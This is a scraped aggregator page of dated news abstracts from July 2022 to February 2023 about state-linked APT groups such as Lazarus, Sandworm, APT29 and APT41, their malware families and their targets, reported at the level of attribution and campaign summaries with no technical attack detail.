A joint report published by ENISA and CERT-EU warns of Chinese APTs targeting businesses and government organizations in the European Union. The European Union Agency for Cybersecurity (ENISA) and CERT-EU warn of multiple China-linked threat actors...Security Affairs
February 15, 2023
North Korea’s APT37 Targeting Southern Counterpart with New M2RAT Malware Full Text
Abstract
The North Korea-linked threat actor tracked as APT37 has been linked to a piece of new malware dubbed M2RAT in attacks targeting its southern counterpart, suggesting continued evolution of the group's features and tactics. APT37, also tracked under the monikers Reaper, RedEyes, Ricochet Chollima, and ScarCruft, is linked to North Korea's Ministry of State Security (MSS) unlike the Lazarus and Kimsuky threat clusters that are part of the Reconnaissance General Bureau (RGB). According to Google-owned Mandiant, MSS is tasked with "domestic counterespionage and overseas counterintelligence activities," with APT37's attack campaigns reflective of the agency's priorities. The operations have historically singled out individuals such as defectors and human rights activists. "APT37's assessed primary mission is covert intelligence gathering in support of DPRK's strategic military, political, and economic interests," the threat intelligence fiThe Hacker News
February 15, 2023
Dark Caracal APT Reappears with a New Version of Bandook Spyware Full Text
Abstract
Lookout Security published a report describing the activities of a new APT actor dubbed Dark Caracal that has claimed hundreds of infections in more than a dozen countries since March of 2022. The APT is currently using a new version of Bandook spyware to target Windows systems. Organizations ... Read MoreCyware
February 13, 2023
Earth Zhulong Group Uses ShellFang Loader to Target Vietnam Full Text
Abstract
Information on the sophisticated APT group Earth Zhulong, which targets Vietnamese organizations, has recently come to light. The gang, which has been active since 2020, is thought to be connected to the hacker collective 1937CN from China. Organizations are suggested to stay alert and leverage bes ... Read MoreCyware
February 12, 2023
Russian Nodaria APT Adds Advanced Information Stealing Functionality Full Text
Abstract
Researchers from Broadcom Symantec took the wraps off of an information-stealing malware known as Graphiron. Russia-affiliated ATP group Nodaria is using it in operations against Ukraine. Written in the Go programming language, the malware enables operators to gather a variety of data from the infe ... Read MoreCyware
February 10, 2023
DPRK fund malicious cyber activities with ransomware attacks on critical Infrastructure Full Text
Abstract
North Korea-linked APT groups conduct ransomware attacks against healthcare and critical infrastructure facilities to fund its activities. Ransomware attacks on critical infrastructure conducted by North Korea-linked hacker groups are used by the government...Security Affairs
February 3, 2023
Russia-linked Gamaredon APT targets Ukrainian authorities with new malware Full Text
Abstract
Russia-linked threat actor Gamaredon employed new spyware in cyber attacks aimed at public authorities and critical information infrastructure in Ukraine. The State Cyber Protection Centre (SCPC) of Ukraine warns of a new wave of targeted attacks...Security Affairs
February 2, 2023
New APT34 Malware Targets The Middle East Full Text
Abstract
Trend Micro analyzed a cyberespionage campaign targeting organizations in the Middle East in December 2022 using a new backdoor. It abuses compromised email accounts to send stolen data to external mail accounts controlled by attackers.Cyware
January 30, 2023
Sandworm APT group hit Ukrainian news agency with five data wipers Full Text
Abstract
The Ukrainian (CERT-UA) discovered five different wipers deployed on the network of the country's national news agency, Ukrinform. On January 17, 2023, the Telegram channel "CyberArmyofRussia_Reborn" reported the compromise of the systems at the Ukrainian...Security Affairs
January 28, 2023
Sandworm APT targets Ukraine with new SwiftSlicer wiper Full Text
Abstract
Russia-linked Sandworm APT group is behind a new Golang-based wiper, tracked as SwiftSlicer, that hit Ukraine, ESET reports. Researchers from ESET discovered a new Golang-based wiper, dubbed SwiftSlicer, that was used in attacks aimed at Ukraine....Security Affairs
January 25, 2023
North Korea-linked TA444 group turns to credential harvesting activity Full Text
Abstract
North Korea-linked TA444 group is behind a credential harvesting campaign targeting a number of industry verticals. Proofpoint researchers reported that North Korea-linked TA444 APT group (aka APT38, BlueNoroff, Copernicium, and Stardust Chollima)...Security Affairs
January 24, 2023
FBI confirms that North Korea-linked Lazarus APT is behind Harmony Horizon Bridge $100 million cyber heist Full Text
Abstract
The U.S. FBI attributes the $100 million cyber heist against Harmony Horizon Bridge to North Korea-linked Lazarus APT. The U.S. Federal Bureau of Investigation (FBI) this week confirmed that in June 2022 the North Korea-linked Lazarus APT group and APT38...Security Affairs
January 19, 2023
BackdoorDiplomacy APT Uses Turian Backdoor to Targets Iranian Government Full Text
Abstract
BackdoorDiplomacy is continuously evolving its TTPs during cyberespionage campaigns. Unit 42 spotted the new campaign by the group that targeted Iranian government entities between July and December 2022. Historically, it has targeted government and diplomatic entities in the Middle East and A ... Read MoreCyware
January 11, 2023
StrongPity APT Uses Trojanized Telegram App to Backdoor its Victims Full Text
Abstract
According to ESET researchers , attackers use a fake Shagle website that tricks victims into downloading the malicious APK file. In reality, the app is a trojanized version of the standard Telegram app for Android.Cyware
January 11,2023
Dark Pink APT Group Targets Governments and Military in APAC Region Full Text
Abstract
Government and military organizations in the Asia-Pacific region are being targeted by a previously unknown advanced persistent threat (APT) actor, per the latest research conducted by Albert Priego of Group-IB Singapore-headquartered Group-IB, in a report shared with The Hacker News, said it's tracking the ongoing campaign under the name Dark Pink and attributed seven successful attacks to the adversarial collective between June and December 2022. The bulk of the attacks have singled out military bodies, government ministries and agencies, and religious and non-profit organizations in Cambodia, Indonesia, Malaysia, Philippines, Vietnam, and Bosnia and Herzegovina, with one unsuccessful intrusion reported against an unnamed European state development body based in Vietnam. The threat actor is estimated to have commenced its operations way back in mid-2021, although the attacks ramped up only a year later using a never-before-seen custom toolkit designed to plunder valuableThe Hacker News
January 10, 2023
StrongPity APT spreads backdoored Android Telegram app via fake Shagle site Full Text
Abstract
The StrongPity APT group targeted Android users with a trojanized version of the Telegram app served through a website impersonating a video chat service called Shagle. ESET researchers reported that StrongPity APT group targeted Android...Security Affairs
January 9, 2023
Russia-linked Cold River APT targeted US nuclear research laboratories Full Text
Abstract
Russia-linked Cold River APT targeted three nuclear research laboratories in the United States in 2022 summer, Reuters reported. Reuters reported that the Russia-linked APT group Cold River (aka Calisto) targeted three nuclear research laboratories...Security Affairs
December 27, 2022
Lazarus APT Uses Phishing Domains to Target NFT Investors Full Text
Abstract
Lazarus Group is believed to be behind a massive phishing campaign targeting NFT investors via nearly 500 phishing domains. They use fake bait websites to offer malicious Mints. The attack begins by sending out spam emails laden with links to legitimate-looking phishing pages that look legitimate.Cyware
December 20, 2022
UAC-0142 APT targets Ukraine’s Delta military intelligence program Full Text
Abstract
Ukraine’s CERT-UA revealed the national Delta military intelligence program has been targeted with a malware-based attack. On December 17, 2022, the Center for Innovations and Development of Defense Technologies of the Ministry of Defense of Ukraine...Security Affairs
December 20, 2022
Russia-linked Gamaredon APT targeted a petroleum refining company in a NATO nation in August Full Text
Abstract
Russia-linked Gamaredon APT group targeted a large petroleum refining company in a NATO state this year amid the invasion of Ukraine. The Russia-linked Gamaredon APT group (aka Shuckworm, Actinium, Armageddon, Primitive Bear, UAC-0010, and Trident...Security Affairs
December 15, 2022
Chinese MirrorFace APT group targets Japanese political entities Full Text
Abstract
A Chinese-speaking APT group, tracked as MirrorFace, is behind a spear-phishing campaign targeting Japanese political entities. ESET researchers recently discovered a spear-phishing campaign targeting Japanese political entities and attributed it to the Chinese-speaking...Security Affairs
December 11, 2022
MuddyWater APT group is back with updated TTPs Full Text
Abstract
The Iran-linked MuddyWater APT is targeting countries in the Middle East as well as Central and West Asia in a new campaign. Deep Instinct’s Threat Research team uncovered a new campaign conducted by the MuddyWater APT (aka SeedWorm, TEMP.Zagros,...Security Affairs
December 9, 2022
Iranian APT Targets US With Drokbk Spyware via GitHub Full Text
Abstract
A subgroup of the state-backed Iranian threat actor Cobalt Mirage is using a new custom malware dubbed "Drokbk" to attack a variety of US organizations, using GitHub as a "dead-drop resolver."Cyware
December 8, 2022
APT37 used Internet Explorer Zero-Day in a recent campaign Full Text
Abstract
Google warns that the North Korea-linked APT37 group is exploiting Internet Explorer zero-day flaw to spread malware. North Korea-linked APT37 group (aka ScarCruft, Reaper, and Group123) actively exploited an Internet Explorer zero-day vulnerability,...Security Affairs
December 5, 2022
Lazarus APT uses fake cryptocurrency apps to spread AppleJeus Malware Full Text
Abstract
The North Korea-linked Lazarus APT spreads fake cryptocurrency apps under the fake brand BloxHolder to install the AppleJeus malware. Volexity researchers warn of a new malware campaign conducted by the North Korea-linked Lazarus APT against cryptocurrency...Security Affairs
December 1, 2022
North Korea ScarCruft APT used previously undetected Dolphin Backdoor against South Korea Full Text
Abstract
North Korea-linked ScarCruft group used a previously undocumented backdoor called Dolphin against targets in South Korea. ESET researchers discovered a previously undocumented backdoor called Dolphin that was employed by North...Security Affairs
November 30, 2022
China-linked UNC4191 APT relies on USB Devices in attacks against entities in the Philippines Full Text
Abstract
An alleged China-linked cyberespionage group, tracked as UNC4191, used USB devices in attacks aimed at Philippines entities. Mandiant researchers spotted an alleged China-linked cyberespionage group, tracked as UNC4191, leveraging USB devices as attack...Security Affairs
November 18, 2022
China-linked Mustang Panda APT Targets Governments Worldwide via Spear-Phishing Attacks Full Text
Abstract
Earth Preta abused fake Google accounts to distribute malware via spear-phishing emails, initially stored in an archive file (such as rar/zip/jar) and distributed through Google Drive links.Trend Micro
November 16, 2022
Lazarus APT uses DTrack backdoor in attacks against LATAM and European orgs Full Text
Abstract
North Korea-linked Lazarus APT is using a new version of the DTrack backdoor in attacks aimed at organizations in Europe and Latin America. North Korea-linked APT Lazarus is using a new version of the DTrack backdoor to attack organizations in Europe...Security Affairs
November 16, 2022
Chinese APT Targets Government and Defense Agencies in Asia Full Text
Abstract
According to Symantec researchers, Billbug targeted a digital certificate authority, as well as government agencies and defense organizations in several countries in Asia in the latest campaign.Cyware Alerts - Hacker News
November 15, 2022
China-linked APT Billbug breached a certificate authority in Asia Full Text
Abstract
A suspected China-linked APT group breached a digital certificate authority in Asia as part of a campaign aimed at government agencies since March 2022. State-sponsored actors compromised a digital certificate authority in a country in Asia as part...Security Affairs
November 15, 2022
Previously undetected Earth Longzhi APT group is a subgroup of APT41 Full Text
Abstract
Trend Micro reported that the Earth Longzhi group, a previously undocumented subgroup of APT41, targets Ukraine and Asian Countries. Early this year, Trend Micro investigated a security breach suffered by a company in Taiwan. Threat actors employed...Security Affairs
November 14, 2022
New “Earth Longzhi” APT Targets Ukraine and Asian Countries with Custom Cobalt Strike Loaders Full Text
Abstract
Entities located in East and Southeast Asia as well as Ukraine have been targeted at least since 2020 by a previously undocumented subgroup of APT41 , a prolific Chinese advanced persistent threat (APT). Cybersecurity firm Trend Micro, which christened the espionage crew Earth Longzhi , said the actor's long-running campaign can be split into two based on the toolset deployed to attack its victims. The first wave from May 2020 to February 2021 is said to have targeted government, infrastructure, and healthcare industries in Taiwan and the banking sector in China, whereas the succeeding set of intrusions from August 2021 to June 2022 infiltrated high-profile victims in Ukraine and several countries in Asia. This included defense, aviation, insurance, and urban development industries in Taiwan, China, Thailand, Malaysia, Indonesia, Pakistan, and Ukraine. The victimology patterns and the targeted sectors overlap with attacks mounted by a distinct sister group of APT41 (akaThe Hacker News
November 11, 2022
Russia-linked IRIDIUM APT linked to Prestige ransomware attacks against Ukraine Full Text
Abstract
Microsoft linked Prestige ransomware attacks against organizations in Ukraine and Poland to Russia-linked threat actors. In Mid-October, Microsoft Threat Intelligence Center (MSTIC) researchers uncovered previously undetected ransomware, tracked as Prestige...Security Affairs
November 10, 2022
APT41’s New Subgroup Earth Longzhi Targets East and Southeast Asia Full Text
Abstract
Both campaigns by the group used spear-phishing emails as the primary entry vector to deliver its malware. It embeds the malware in a password-protected archive or shares a link to download it, luring the victim with information about a person.Trend Micro
November 10, 2022
APT29 abused the Windows Credential Roaming in an attack against a diplomatic entity Full Text
Abstract
Russia-linked APT29 cyberespionage group exploited a Windows feature called Credential Roaming to target a European diplomatic entity. Mandiant researchers in early 2022 responded to an incident where the Russia-linked APT29 group (aka SVR group, Cozy...Security Affairs
November 09, 2022
APT29 Exploited a Windows Feature to Compromise European Diplomatic Entity Network Full Text
Abstract
The Russia-linked APT29 nation-state actor has been found leveraging a "lesser-known" Windows feature called Credential Roaming as part of its attack against an unnamed European diplomatic entity. "The diplomatic-centric targeting is consistent with Russian strategic priorities as well as historic APT29 targeting," Mandiant researcher Thibault Van Geluwe de Berlaere said in a technical write-up. APT29, a Russian espionage group also called Cozy Bear, Iron Hemlock, and The Dukes, is known for its intrusions aimed at collecting intelligence that align with the country's strategic objectives. It's believed to be sponsored by the Foreign Intelligence Service (SVR). Some of the adversarial collective's cyber activities are tracked publicly under the moniker Nobelium , a threat cluster responsible for the widespread supply chain compromise through SolarWinds software in December 2020. The Google-owned threat intelligence and incident response firm sThe Hacker News
November 8, 2022
APT36 Targets Indian Government Employees with Limepad Full Text
Abstract
A new malware campaign by Pakistan-linked Transparent Tribe was found targeting Indian government entities with trojanized strains of a 2FA solution, named Kavach. APT-36 has registered several domains spoofing Indian government organization sites to launch credential harvesting and phishing attack ... Read MoreCyware Alerts - Hacker News
November 3, 2022
APT10 Targets Japan with New LODEINFO Backdoor Variant Full Text
Abstract
Chinese hacking group Cicada, aka APT10, was found abusing antivirus software to deploy a new variant of the LODEINFO malware against Japanese organizations. LODEINFO operators have been updating the malware very frequently and continuously, to make it leaner and more efficient. Through LODEINFO, A ... Read MoreCyware Alerts - Hacker News
November 03, 2022
OPERA1ER APT Hackers Targeted Dozens of Financial Organizations in Africa Full Text
Abstract
A French-speaking threat actor dubbed OPERA1ER has been linked to a series of more than 30 successful cyber attacks aimed at banks, financial services, and telecom companies across Africa, Asia, and Latin America between 2018 and 2022. According to Singapore-headquartered cybersecurity company Group-IB, the attacks have led to thefts totaling $11 million, with actual damages estimated to be as high as $30 million. Some of the more recent attacks in 2021 and 2021 have singled out five different banks in Burkina Faso, Benin, Ivory Coast, and Senegal. Many of the victims identified are said to have been compromised twice, and their infrastructure subsequently weaponized to strike other organizations. OPERA1ER, also known by the names DESKTOP-GROUP, Common Raven, and NXSMS, is known to be active since 2016, operating with the goal of conducting financially motivated heists and exfiltration of documents for further use in spear-phishing attacks. "OPERA1ER often operates duringThe Hacker News
October 28, 2022
Kimsuky APT Adds New Android Malware to its Arsenal Full Text
Abstract
As per the findings by S2W’s threat research and intelligence center, the three new malware, FastFire, FastViewer, and FastSpy, are masquerading as APKs for three utility tools on Google Play Store.Cyware Alerts - Hacker News
October 25, 2022
SideWinder APT Uses New WarHawk Backdoor Against Pakistan Full Text
Abstract
Nation-state actor SideWinder compromised the official website of the National Electric Power Regulatory Authority (NEPRA) to deliver a tailored malware called WarHawk. Multiple malicious modules in WarHawk deliver Cobalt Strike, including new TTPs such as KernelCallBackTable injection and checking ... Read MoreCyware Alerts - Hacker News
October 24, 2022
SideWinder APT Using New WarHawk Backdoor to Target Entities in Pakistan Full Text
Abstract
SideWinder, a prolific nation-state actor mainly known for targeting Pakistan military entities, compromised the official website of the National Electric Power Regulatory Authority (NEPRA) to deliver a tailored malware called WarHawk . "The newly discovered WarHawk backdoor contains various malicious modules that deliver Cobalt Strike, incorporating new TTPs such as KernelCallBackTable injection and Pakistan Standard Time zone check in order to ensure a victorious campaign," Zscaler ThreatLabz said . The threat group, also called APT-C-17, Rattlesnake, and Razor Tiger, is suspected to be an Indian state-sponsored group, although a report from Kaspersky earlier this May acknowledged previous indicators that led to the attribution have since disappeared, making it challenging it to link the threat cluster to a specific nation. More than 1,000 attacks are said to have been launched by the group since April 2020, an indication of SideWinder's newfound aggressionThe Hacker News
October 18, 2022
China-linked APT41 group targets Hong Kong with Spyder Loader Full Text
Abstract
China-linked threat actors APT41 (a.k.a. Winnti) targeted organizations in Hong Kong, in some cases remaining undetected for a year. Symantec researchers reported that cyberespionage group APT41 targeted organizations in Hong Kong in a campaign that...Security Affairs
October 14, 2022
WIP19, a new Chinese APT targets IT Service Providers and Telcos Full Text
Abstract
Chinese-speaking threat actor, tracked as WIP19, is targeting telecommunications and IT service providers in the Middle East and Asia. SentinelOne researchers uncovered a new threat cluster, tracked as WIP19, which has been targeting telecommunications...Security Affairs
October 13, 2022
China-linked Budworm APT returns to target a US entity Full Text
Abstract
The Budworm espionage group resurfaced targeting a U.S.-based organization for the first time, Symantec Threat Hunter team reported. The Budworm cyber espionage group (aka APT27, Bronze Union, Emissary Panda, Lucky Mouse, TG-3390, and Red Phoenix)...Security Affairs
October 13, 2022
POLONIUM APT targets Israel with a new custom backdoor dubbed PapaCreep Full Text
Abstract
An APT group tracked as Polonium employed custom backdoors in attacks aimed at Israelian entities since at least September 2021. POLONIUM APT focused only on Israeli targets, it launched attacks against more than a dozen organizations in various industries,...Security Affairs
October 13, 2022
New Chinese APT Targets IT Service Providers and Telcos with Signed Malware Full Text
Abstract
As the toolset itself appears to be shared among several actors, it is unclear whether this is a new iteration of operation “Shadow Force” or simply a different actor utilizing similar TTPs.Sentinel One
October 7, 2022
APT Groups Target U.S. Government Agencies with CovalentStealer Full Text
Abstract
The U.S. government alerted against state-backed hackers using the custom CovalentStealer malware and Impacket framework to steal confidential information from a Defense Industrial Base organization. To gain initial access through the victim’s network, the attackers attempted to exploit ProxyLogon ... Read MoreCyware Alerts - Hacker News
October 4, 2022
Lazarus APT employed an exploit in a Dell firmware driver in recent attacks Full Text
Abstract
North Korea-linked Lazarus APT has been spotted deploying a Windows rootkit by taking advantage of an exploit in a Dell firmware driver. The North Korea-backed Lazarus Group has been observed deploying a Windows rootkit by relying on exploit in a Dell...Security Affairs
October 4, 2022
Linux Cheerscrypt ransomware is linked to Chinese DEV-0401 APT group Full Text
Abstract
Researchers link recently discovered Linux ransomware Cheerscrypt to the China-linked cyberespionage group DEV-0401. Researchers at cybersecurity firm Sygnia attributed the recently discovered Linux ransomware Cheerscrypt to the China-linked cyber...Security Affairs
October 4, 2022
SolarMarker APT Returns in a New Watering Hole Attack Full Text
Abstract
Digital adversaries behind the SolarMarker malware crippled a global tax consulting firm by camouflaging fake Chrome browser updates as part of watering hole attacks. Threat actors use the Google Dorking technique and conduct source code searches to identify such vulnerable websites before injectin ... Read MoreCyware Alerts - Hacker News
September 30, 2022
Witchetty APT used steganography in attacks against Middle East entities Full Text
Abstract
A cyberespionage group, tracked as Witchetty, used steganography to hide a previously undocumented backdoor in a Windows logo. Broadcom's Symantec Threat Hunter Team observed a threat actor, tracked as Witchetty, using steganography to hide a previously...Security Affairs
September 28, 2022
APT28 relies on PowerPoint Mouseover to deliver Graphite malware Full Text
Abstract
The Russia-linked APT28 group is using mouse movement in decoy Microsoft PowerPoint documents to distribute malware. The Russia-linked APT28 employed a technique relying on mouse movement in decoy Microsoft PowerPoint documents to deploy malware,...Security Affairs
September 26, 2022
China-linked TA413 group targets Tibetan entities with new backdoor Full Text
Abstract
China-linked cyberespionage group TA413 exploits employ a never-before-undetected backdoor called LOWZERO in attacks aimed at Tibetan entities. A China-linked cyberespionage group, tracked as TA413 (aka LuckyCat), is exploiting recently disclosed...Security Affairs
September 26, 2022
Metador, a never-before-seen APT targeted ISPs and telco for about 2 years Full Text
Abstract
A previously undetected hacking group, tracked as Metador, has been targeting telecommunications, internet services providers (ISPs), and universities for about two years. SentinelLabs researchers uncovered a never-before-seen threat actor, tracked...Security Affairs
September 23, 2022
Researchers Uncover New Metador APT Targeting Telcos, ISPs, and Universities Full Text
Abstract
A previously undocumented threat actor of unknown origin has been linked to attacks targeting telecom, internet service providers, and universities across multiple countries in the Middle East and Africa. "The operators are highly aware of operations security, managing carefully segmented infrastructure per victim, and quickly deploying intricate countermeasures in the presence of security solutions," researchers from SentinelOne said in a new report. The cybersecurity firm codenamed the group Metador in reference to a string "I am meta" in one of their malware samples and because of Spanish-language responses from the command-and-control (C2) servers. The threat actor is said to have primarily focused on the development of cross-platform malware in its pursuit of espionage aims. Other hallmarks of the campaign are the limited number of intrusions and long-term access to targets. This includes two different Windows malware platforms called metaMain and MaThe Hacker News
September 20, 2022
Russian Sandworm APT impersonates Ukrainian telcos to deliver malware Full Text
Abstract
Russia-linked APT group Sandworm has been observed impersonating telecommunication providers to target Ukrainian entities with malware. Russia-linked cyberespionage group Sandworm has been observed impersonating telecommunication providers to target...Security Affairs
September 16, 2022
North Korea-linked APT spreads tainted versions of PuTTY via WhatsApp Full Text
Abstract
North Korea-linked threat actor UNC4034 is spreading tainted versions of the PuTTY SSH and Telnet client. In July 2022, Mandiant identified a novel spear phish methodology that was employed by North Korea-linked threat actor UNC4034. The attackers...Security Affairs
September 15, 2022
Russia-linked Gamaredon APT target Ukraine with a new info-stealer Full Text
Abstract
Russia-linked Gamaredon APT targets employees of the Ukrainian government, defense, and law enforcement agencies with a custom information-stealing malware. Russia-linked Gamaredon APT group (aka Shuckworm, Actinium, Armageddon, Primitive Bear,...Security Affairs
September 15, 2022
Gamaredon APT Targets Ukrainian Government, Defense Agencies in New Campaign Full Text
Abstract
The campaign aims to deliver information-stealing malware to Ukrainian victim machines and makes heavy use of multiple modular PowerShell and VBScript (VBS) scripts as part of the infection chain.Cisco Talos
September 14, 2022
SparklingGoblin APT Hackers Using New Linux Variant of SideWalk Backdoor Full Text
Abstract
A Linux variant of a backdoor known as SideWalk was used to target a Hong Kong university in February 2021, underscoring the cross-platform abilities of the implant. Slovak cybersecurity firm ESET, which detected the malware in the university's network, attributed the backdoor to a nation-state actor dubbed SparklingGoblin . The unnamed university is said to have been already targeted by the group in May 2020 during the student protests . "The group continuously targeted this organization over a long period of time, successfully compromising multiple key servers, including a print server, an email server, and a server used to manage student schedules and course registrations," ESET said in a report shared with The Hacker News. SparklingGoblin is the name given to a Chinese advanced persistent threat (APT) group with connections to the Winnti umbrella (aka APT41, Barium, Earth Baku, or Wicked Panda). It's primarily known for its attacks targeting various enThe Hacker News
September 14, 2022
SparklingGoblin APT adds a new Linux variant of SideWalk implant to its arsenal Full Text
Abstract
China-linked SparklingGoblin APT was spotted using a Linux variant of a backdoor known as SideWalk against a Hong Kong university. Researchers from ESET discovered a Linux variant of the SideWalk backdoor, which is a custom implant used by the China-linked...Security Affairs
September 11, 2022
Iranian APT42 Launched Over 30 Espionage Attacks Against Activists and Dissidents Full Text
Abstract
A state-sponsored advanced persistent threat (APT) actor newly christened APT42 (formerly UNC788) has been attributed to over 30 confirmed espionage attacks against individuals and organizations of strategic interest to the Iranian government at least since 2015. Cybersecurity firm Mandiant said the group operates as the intelligence gathering arm of Iran's Islamic Revolutionary Guard Corps (IRGC), not to mention shares partial overlaps with another cluster called APT35 , which is also known as Charming Kitten, Cobalt Illusion, ITG18, Phosphorus, TA453, and Yellow Garuda. APT42 has exhibited a propensity to strike various industries such as non-profits, education, governments, healthcare, legal, manufacturing, media, and pharmaceuticals spanning at least 14 countries, including in Australia, Europe, the Middle East, and the U.S. Intrusions aimed at the pharmaceutical sector are also notable for the fact that they commenced at the onset of the COVID-19 pandemic in March 2020, iThe Hacker News
September 11, 2022
Iran-linked APT42 is behind over 30 espionage attacks Full Text
Abstract
Iran-linked APT42 (formerly UNC788) is suspected to be the actor behind over 30 cyber espionage attacks against activists and dissidents. Experts attribute over 30 cyber espionage attacks against activists and dissidents to the Iran-linked APT42...Security Affairs
September 10, 2022
China-Linked BRONZE PRESIDENT APT targets Government officials worldwide Full Text
Abstract
China-linked BRONZE PRESIDENT group is targeting government officials in Europe, the Middle East, and South America with PlugX malware. Secureworks researchers reported that China-linked APT group BRONZE PRESIDENT conducted a new campaign aimed at government...Security Affairs
September 8, 2022
North Korea-linked Lazarus APT targets energy providers around the world Full Text
Abstract
North Korea-linked Lazarus APT group is targeting energy providers around the world, including organizations in the US, Canada, and Japan. Talos researchers tracked a campaign, orchestrated by North Korea-linked Lazarus APT group, aimed...Security Affairs
September 7, 2022
New Iran-linked APT42 group deploys Android spyware for cyberespionage Full Text
Abstract
Mandiant has collected enough evidence to determine that APT42 is a state-sponsored threat actor who engages in cyberespionage against individuals and organizations of particular interest to the Iranian government.Mandiant
September 07, 2022
New Iranian hacking group APT42 deploys custom Android spyware Full Text
Abstract
A new Iranian state-sponsored hacking group known as APT42 has been discovered using a custom Android malware to spy on targets of interest.BleepingComputer
August 31, 2022
China-linked APT40 used ScanBox Framework in a long-running espionage campaign Full Text
Abstract
Experts uncovered a cyber espionage campaign conducted by a China-linked APT group and aimed at several entities in the South China Sea. Proofpoint’s Threat Research Team uncovered a cyber espionage campaign targeting entities across the world that...Security Affairs
August 30, 2022
Chinese APT40 Hackers Targeted Australian Manufacturers, Wind Turbine Operators Using ScanBox Malware Full Text
Abstract
In this latest campaign that took place between April and June, the hacking group appeared to focus on global heavy industry manufacturers that conduct maintenance of fleets of wind turbines in the South China Sea.CyberScoop
August 26, 2022
Iran-linked Mercury APT exploited Log4Shell in SysAid Apps for initial access Full Text
Abstract
An Iran-linked Mercury APT group exploited the Log4Shell vulnerability in SysAid applications for initial access to the targeted organizations. The Log4Shell flaw (CVE-2021-44228) made the headlines in December after Chinese security researcher...Security Affairs
August 26, 2022
GoldDragon campaign: North-Korea linked Kimsuky APT adopts victim verification technique Full Text
Abstract
The North Korea-linked Kimsuky APT is behind a new campaign, tracked as GoldDragon, targeting political and diplomatic entities in South Korea in early 2022. Researchers from Kaspersky attribute a series of attacks, tracked as GoldDragon, against...Security Affairs
August 25, 2022
Nobelium APT uses new Post-Compromise malware MagicWeb Full Text
Abstract
Russia-linked APT group Nobelium is behind a new sophisticated post-exploitation malware tracked by Microsoft as MagicWeb. Microsoft security researchers discovered a post-compromise malware, tracked as MagicWeb, which is used by the Russia-linked...Security Affairs
August 19, 2022
Russia-linked Cozy Bear uses evasive techniques to target Microsoft 365 users Full Text
Abstract
Russia-linked APT group Cozy Bear continues to target Microsoft 365 accounts in NATO countries for cyberespionage purposes. Mandiant researchers reported that the Russia-linked Cozy Bear cyberespionage group (aka APT29, CozyDuke, and Nobelium),...Security Affairs
August 19, 2022
Russian APT29 hackers abuse Azure services to hack Microsoft 365 users Full Text
Abstract
The state-backed Russian cyberespionage group Cozy Bear has been particularly prolific in 2022, targeting Microsoft 365 accounts in NATO countries and attempting to access foreign policy information.BleepingComputer
August 18, 2022
China-backed APT41 Hackers Targeted 13 Organisations Worldwide Last Year Full Text
Abstract
The Chinese advanced persistent threat (APT) actor tracked as Winnti (aka APT41) has targeted at least 13 organizations geographically spanning across the U.S, Taiwan, India, Vietnam, and China against the backdrop of four different campaigns in 2021. "The targeted industries included the public sector, manufacturing, healthcare, logistics, hospitality, education, as well as the media and aviation," cybersecurity firm Group-IB said in a report shared with The Hacker News. This also included the attack on Air India that came to light in June 2021 as part of a campaign codenamed ColunmTK . The other three campaigns have been assigned the monikers DelayLinkTK, Mute-Pond, and Gentle-Voice based on the domain names used in the attacks. APT41, also known as Barium, Bronze Atlas, Double Dragon, Wicked Panda, or Winnti, is a prolific Chinese cyber threat group that's known to carry out state-sponsored espionage activity in parallel with financially motivated operatiThe Hacker News
August 18, 2022
APT41 Group: 4 Malicious Campaigns, 13 Victims, New Tools and Techniques Full Text
Abstract
Group-IB researchers emphasize that the group usually used certain servers exclusively to host the Cobalt Strike framework, while they exploited others only for active scanning through Acunetix.Help Net Security
August 18, 2022
Winnti hackers split Cobalt Strike into 154 pieces to evade detection Full Text
Abstract
The Chinese Winnti hacking group, also known as 'APT41' or 'Wicked Spider,' targeted at least 80 organizations last year and successfully breached the networks of at least thirteen.BleepingComputer
August 17, 2022
China-linked RedAlpha behind multi-year credential theft campaign Full Text
Abstract
A China-linked APT group named RedAlpha is behind a long-running mass credential theft campaign aimed at organizations worldwide. Recorded Future researchers attributed a long-running mass credential theft campaign to a Chinese nation-state actor...Security Affairs
August 17, 2022
North Korea-linked APT targets Job Seekers with macOS malware Full Text
Abstract
The North Korea-linked Lazarus Group has been observed targeting job seekers with macOS malware working also on Intel and M1 chipsets. ESET researchers continue to monitor a cyberespionage campaign, tracked as "Operation In(ter)ception," that has been...Security Affairs
August 16, 2022
Russia-linked Gamaredon APT continues to target Ukraine Full Text
Abstract
Russia-linked Gamaredon APT group targets Ukrainian entities with PowerShell info-stealer malware dubbed GammaLoad. Russia-linked Gamaredon APT group (aka Shuckworm, Actinium, Armageddon, Primitive Bear, and Trident Ursa) targets Ukrainian entities...Security Affairs
August 15, 2022
Iron Tiger APT is behind a supply chain attack that employed messaging app MiMi Full Text
Abstract
China-linked threat actors Iron Tiger backdoored a version of the cross-platform messaging app MiMi to infect systems. Trend Micro researchers uncovered a new campaign conducted by a China-linked threat actor Iron Tiger that employed a backdoored...Security Affairs
August 12, 2022
Bitter APT and Transparent Tribe Campaigns on Social Media Full Text
Abstract
Meta recently took down two cyberespionage campaigns across its social media platforms. These campaigns were being operated by Bitter APT and Transparent Tribe threat groups.Cyware Alerts - Hacker News
August 12, 2022
DoNot Team APT Updates its Malware Arsenal Full Text
Abstract
Morphisec Labs researchers have reported that the group has added new modules to its Windows spyware framework aka YTY, Jaca. These latest samples appear to be used in the wild.Cyware Alerts - Hacker News
August 9, 2022
`
Experts linked Maui ransomware to North Korean Andariel APT Full Text
Abstract
Cybersecurity researchers from Kaspersky linked the Maui ransomware to the North Korea-backed Andariel APT group. Kaspersky linked with medium confidence the Maui ransomware operation to the North Korea-backed APT group Andariel, which is considered...Security Affairs
August 9, 2022
US sanctioned crypto mixer Tornado Cash used by North Korea-linked APT Full Text
Abstract
The U.S. Treasury Department's Office of Foreign Assets Control (OFAC) sanctioned the crypto mixer service Tornado Cash used by North Korea. The U.S. Treasury Department's Office of Foreign Assets Control (OFAC) has sanctioned the crypto mixer service...Security Affairs
August 05, 2022
Facebook finds new Android malware used by APT hackers Full Text
Abstract
Meta (Facebook) has released its Q2 2022 adversarial threat report, and among the highlights is the discovery of two cyber-espionage clusters connected to hacker groups known as 'Bitter APT' and APT36 (aka 'Transparent Tribe') using new Android malware.BleepingComputer
July 28, 2022
Things to Know About STIFF#BIZON Campaign Full Text
Abstract
APT37 is targeting high-value organizations in Poland, the Czech Republic, and other European countries, with Konni RAT. The campaign is dubbed STIFF#BIZON. The attacked phishing document is a decoy and seems to be a report from a Russian war correspondent, Olga Bozheva. Researchers have shared som ... Read MoreCyware Alerts - Hacker News
July 28, 2022
